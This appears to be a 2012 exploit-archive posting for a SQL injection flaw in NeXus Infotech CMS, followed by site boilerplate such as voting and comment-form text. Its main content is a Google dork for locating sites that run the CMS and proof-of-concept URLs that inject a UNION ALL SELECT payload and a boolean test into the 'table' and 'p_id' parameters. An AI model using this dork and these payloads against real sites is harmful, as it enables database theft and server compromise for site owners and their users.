NeXus Infotech CMS SQL Injection

2012.05.08

Credit: gr00ve_hack3r

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:\"Powered By NeXus Infotech\"

# Exploit title : NeXus Infotech CMS SQL Injection Vulnerability
# Date : May 05,2012
# Author : gr00ve_hack3r
# Contact : groove.hacker7/a/t/gmail.com
# Homepage : www.gr00ve-hack3r.com
# Vendor : NeXus Infotech
# Vendor Site : http://www.nexusinfotech.org/
# Google Dork : intext:"Powered By NeXus Infotech"
# Vulnerability :
GET parameter " table " and " p_id " accept unsanitised user input and
result in SQL injection which can lead to server compromise
# PoC Exploit :
[+] http://[host].com/index.php?pagename=photogallery&table=photogallery
UNION ALL SELECT 1, 1, CONCAT(CHAR(1),CHAR(1),CHAR(1))#
[+] http://www.[host].com/details.asp?p_id=1 AND 2=2

References:

http://www.nexusinfotech.org/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

NeXus Infotech CMS SQL Injection

Dork: intext:\"Powered By NeXus Infotech\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.